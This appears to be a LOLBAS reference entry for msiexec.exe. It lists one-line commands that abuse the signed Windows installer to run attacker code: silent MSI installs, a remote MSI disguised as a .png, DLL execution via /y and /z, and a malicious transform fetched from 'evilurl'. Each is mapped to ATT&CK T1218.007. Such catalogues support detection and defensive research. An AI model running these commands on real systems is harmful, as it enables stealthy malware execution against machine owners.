-
Installs the target .MSI file silently.
msiexec /quiet /i cmd.msi
- Use case
- Execute custom made msi file with attack code
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1218.007
-
Installs the target remote & renamed .MSI file silently.
msiexec /q /i http://192.168.100.3/tmp/cmd.png
- Use case
- Execute custom made msi file with attack code from remote server
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1218.007
-
Calls DLLRegisterServer to register the target DLL.
msiexec /y "C:\folder\evil.dll"
- Use case
- Execute dll files
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1218.007
- Tags
Execute: DLL
This LOLBAS executes Dynamic-Link Libraries (DLLs).
-
Calls DLLUnregisterServer to un-register the target DLL.
msiexec /z "C:\folder\evil.dll"
- Use case
- Execute dll files
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1218.007
- Tags
Execute: DLL
This LOLBAS executes Dynamic-Link Libraries (DLLs).
-
Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
- Use case
- Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1218.007